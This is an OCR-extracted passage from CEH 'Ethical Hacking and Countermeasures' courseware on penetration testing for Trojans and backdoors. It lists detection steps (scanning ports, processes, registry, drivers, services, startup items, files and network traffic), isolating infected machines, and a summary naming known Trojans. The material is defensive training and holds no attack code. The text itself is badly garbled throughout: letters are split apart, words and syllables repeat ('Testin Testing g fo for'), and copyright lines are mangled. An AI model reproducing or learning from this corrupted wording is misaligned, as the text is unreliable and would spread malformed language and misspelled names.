M o d u l e F lo lo w A s a p e n e t r a t i o n t e s t e r , y o u s h o u l d f o l l o w t h e s a m e s t r a t e g ie ie s a s t h a t o f a n a t t a c k e r t o t e s t y o u r n e t w o r k o r s y st s t e m a g a i ns n s t T r o j a n a n d b a c k d o o r a t t a c k s . Yo Y o u s h o u ld ld p e r f o r m a l l t h e available attacking techniques including the newly emerged attacking techniques. This allows y o u t o f i g u r e o u t t h e l o o p h o l e s o r v u l n e r a b i l it it i e s i n t h e t a r g e t o r g a n i z a t i o n ' s s e c u r i ty ty . I f y o u f i n d a n y v u l n e r a b i l i t ie ie s o r l o o p h o l e s , y o u s h o u l d s u g g e s t c o u n t e r m e a s u r e s t h a t c a n m a k e t h e organization's security better and stronger.
Trojan Concepts
Countermeasures —
, •
Trojans Infection
! / — V —
Types of Trojans
| | || | r
Anti-Trojan Software P e n e t r a t i o n T e s t in in g
Trojan Detection
Module 06 Page 999
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
P e n Testin Testing g fo for Trojans a n d Backdoors Use tools such as
0
TCPViewand
CEH
S c an an t h e s y st st e m fo fo r o p e n p o r ts ts , running processes, processes, registry entries,
CurrPorts
device drivers and services services 0
If any suspicious port, process, process, registry entry, device driver or
Scan for running Processes
Use tools such as
service is discovered, discovered, che ck the
W h a t ' s R u n n in in g
associated executable files 0
C o l le le c t m o r e i n f o r m a t i o n a b o u t these from pu blisher's websites, if
Scan for registry entries Scan for device drivers installed on the computer
Scan for Windows services
Use tools such as jv l6 Po we r To ols 2012 and PC Tools Registry Mechanic
available, and Internet 0
C h e c k i f t h e o p e n p o rt rt s ar ar e k n o w n to be opened by Trojans in wild
Use tools such as DriverView and D r i v e r D e t e c t iv iv e
Use tools such as SrvMan and ServiWin
Copyright © by
EG-G*ancil. All
Rights Reserved. Reproduction is Strictly Prohibited.
P e n T e s t i n g fo fo r T r o j a n s a n d B a c k d o o r s Step 1: Scan for open ports O p e n p o r t s a r e t h e p r i m a r y s o u r c e s t o l a u n c h a t ta ta c k s . T h e r e f o r e , i n a n a t t e m p t t o m a k e y o u r network secure by conducting pen testing, you should find the open ports and protect them. Y o u ca ca n f i n d t h e u n n e c e s s a r y o p e n p o r t s b y s c a n n i n g f o r o p e n p o r t s . F o r t h i s p u r p o s e , y o u c a n use the tools such as TCPView and CurrPorts.
Step 2: Scan for running processes Most Trojans don't require the user to start the process. They start automatically and don't even no tify the use err . Th Th i s k in in d o f T r o j a n c a n b e d e t e c t e d b y s c a n n i n g f o r r u n n i n g p r o c e s s e s . In In order to scan for running processes, you can use tools such as What's Running, which scans y o u r s y s t e m a n d l i st st s a llll c u r r e n t l y a c t i v e p r o g r a m s , p r o c e s s e s , s e r v ic ic e s , m o d u l e s , a n d n e t w o r k c o n n e c t i o n s . I t al al s o i n c lu lu d e s s p e c ia ia l a r ea ea s t o d i s p l a y s t a r t u p p r o g r a m s .
Step 3: Scan for registry entries A f e w T r o ja ja n s r u n i n th t h e b a c k g r o u n d w i t h o u t a n y n o t i f ic ic a t i o n t o t h e s y s te t e m ' s u se s e r. r. I f y o u w a n t to test for such Trojans, then you should scan for registry entries. This can be done with the h e l p o f t o o l s s u c h a s J V P o w e r T o o l s a n d PC T o o l s R e g i s t r y M e c h a n i c .
Mo dule 06 Page Page 1000
Ethical Hacking and Coun termea sures Copyright © by EC-C0 EC-C0Un UnCi Cill All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
Step 4: Scan for device drivers installed on the computer I n o r d e r t o c o n t r o l t h e h a r d w a r e , m o s t m o d e r n O Se S e s u se se t h e i r o w n d e v i c e d r i v e rs rs . A t t a c k e r s c a n t a k e a d v a n t a g e o f t h i s s i t u a t i o n t o s p r e a d T r o j a n s a n d b a c k d o o r s t h r o u g h d e v i c e d r iv iv e r f ilil e s. s. T r o j a n s s p r e ad a d t h r o u g h d e v i c e d r i v e r s i n f e c t t h e d e v i c e d r i v e r f i le le s a n d o t h e r p r o c es es s es es .
Step 5: Scan for Windows services I f y o u f i n d a n y o f t h e W i n d o w s s e r v ic ic e s s u s p ic ic i ou ou s , t h e n c h e c k t h e a s s o c i a t ed e d e x e c u t a b l e f i l es es . To scan Windows services, you can use the tools such as SrvMan and ServiWin.
Module 06 Page 1001
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
Step 6: Scan for startup programs S o m e T ro r o j a ns n s r u n a u t o m a t i c a l l y w h e n y o u s t a r t W i n d o w s . T h e r e f o r e , s c an an f o r S t a r t u p p r o g r a m s using tools such as Starter, Security AutoRun, and Autoruns and check the listed startup programs
and
determine
if
all
the
programs
in
the
list
can
be
recognized
with
known
functionalities.
Step 7: Scan for files and folders T h e e a sy sy w a y f o r a n a t t a c k e r t o h a c k a s y s t e m i s w i t h t h e u s e o f f ilil e s e m b e d d e d w i t h T r o j a n p a c k a g e s. s. F i r e w a l l s , ID ID Se Se s, s, a n d o t h e r s e c u r i t y m e c h a n i s m s m a y f a i l t o p r e v e n t t h i s k i n d o f attack. Therefore, you need to scan all files and folders for Trojans and backdoors. You can scan files and fold ers using tools such as FCI FCIV, V, TRIPWIRE, TRIPWIRE, SIGV SIGVER ERIF, IF, FastSum, and W inM D 5.
Step 8: Scan for network activities N e t w o r k a c t i v it it i e s s uc u c h as as u p l o a d o f b u l k f i le le s o r u n u s u a l l y h ig ig h t r a f f i c g o i n g t o a p a r t i c u l a r w e b a d d r e ss ss m a y s o m e t i m e s r e p r e s e n t a s ig ig n o f T r o j a n . Yo Yo u s h o u l d s ca c a n f o r s uc uc h n e t w o r k a c t i v i t i e s . T o o l s s u c h a s C ap ap s a N e t w o r k A n a l y z e r c an an b e u s e d f o r t h i s p u r p o s e .
Module 06 Page 1002
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
Step 9: Scan for modification to OS files Check the critical OS file modification or manipulation using tools such as TRIPWIRE or m a n u a l l y c o m p a r e h a ssh h v a l u es e s i f y o u h a v e a b a c k u p c o py py .
Step 10: Run Trojan Scanner to detec t Trojans Trojan scanners such as Trojan Hunter and Emsisoft Anti-Malware are readily available in the m a r k e t . Y o u c an an i n s t a llll a n d r u n t h o s e T r o j a n s c a n n e r s t o d e t e c t T r o j a n s o n y o u r s y s t e m .
Module 06 Page 1003
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
P e n Testin Testing g fo for Trojans a n d Backdoors (Cont’d) Document all the findings
0
If Trojans ••>
are d e t e ct ct e d ?
CEH
Docum ent all your findings in
NO
previous steps; it helps in
A.
d e t e r m i n i n g t h e n e x t a c t io io n i f Trojans are identified in the system
YES
0
I s o l a te te i n f e c t e d s y s t e m f r o m the network immediately to prevent further infection
I s o l a te te t h e m a c h i n e f ro ro m n e t w o r k
9
S a n i titi z e t h e c o m p l e t e s y s t e m for Trojans using an updated anti-virus
solution to clean Trojans
Copyright © by
EG-G*ancil. All
Rights Reserved. Reproduction Is Strictly Prohibited.
P e n T e s t in i n g f o r T r o j a n s a n d B a c k d o o r s ( C o n t ’d ’d ) Step 11: Document all the findings Once you conduct all possible tests to find the Trojans, document all the findings that you obtain at each test for analysis and check if there is any sign of a Trojan.
Step 12: Isolate the machine from the network W h e n y o u f i n d a T r o j a n o n a m a c h i n e , y o u s h o u ld ld i s o l a te te t h e m a c h i n e i m m e d i a t e l y f r o m t h e n e t w o r k b e f o r e i t ta t a k e s c o n t r o l o v e r o t h e r s y s t em e m s i n th t h e n e t w o r k . C h ec ec k w h e t h e r t h e a n t i v i ru ru s software is updated or not. I f t h e a n t i v i r u s is i s n o t u p d a t e d , t h e n u p d a t e i t a n d t h e n r u n i t t o s c an an t h e s y s t e m . I f t h e a n t i v i r u s i s a l r e a d y u p d a t e d , t h e n f i n d o t h e r a n t i v i r u s s o l u t i o n s t o c l e a n T r o ja ja n s .
Module 06 Page 1004
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
Module Module Sum m ary
C EH
Trojans are malicious pieces of code that carry cracker softwa re to a target system □
They are used primarily to gain gain and retain retain access on the target system
□
They often reside deep in in the system and make make registry registry changes changes that allow them to meet their purpose as a remote administration tool
□
Popular Trojans Trojans include include MoSucker, Remo teBy Mail , Illusion Illusion Bot, and and Zeus Zeus
□
Aware ness and preventive meas ures are the best defences against Trojans Trojans
□
Using anti-Tr anti-Trojan ojan tools such such as TrojanHunter and Emsisoft Anti-Malwa re to detect and eliminate Trojans Trojans
Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited.
M o d u llee S u m m a r y 9
T r o j a n s a r e m a l ic i c i o u s p ie i e c e s o f c o d e t h a t c a r ry ry c r a c k e r s o f t w a r e t o a t a r g e t s y s te te m .
©
T h e y a re re u s ed ed p r i m a r i l y t o g a i n a n d r e t a i n a cc cc e s s o n t h e t a r g e t s y s t e m .
9
T h e y o f t e n r e s i de d e d e e p in in t h e s y s t e m a n d m a k e r e g i s t ry r y ch ch a n g e s t h a t a l l o w t h e m t o m e e t t h e i r p u r p o s e a s a r e m o t e a d m i n i s t ra ra t i o n t o o l .
0
P o p u l a r T r o j a n s i n c l u d e M o S u c k e r , R e m o t e B y M a i l , I l l u s io io n Bo Bo t , a n d Z e us us .
0
A w a r e n e s s a n d p r e v e n t i v e m e a s u r e s a r e t h e b e s t d e f e n c e s a g a i n s t T r o j an an s .
9
U s in i n g a n t i - T r o j a n t o o l s su s u c h a s T r o j a n H u n t e r a n d E m s i s of o f t A n t i - M a l w a r e t o d e t e c t a nd nd e l i m i n a t e T r o j a ns ns .
Module 06 Page 1005
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.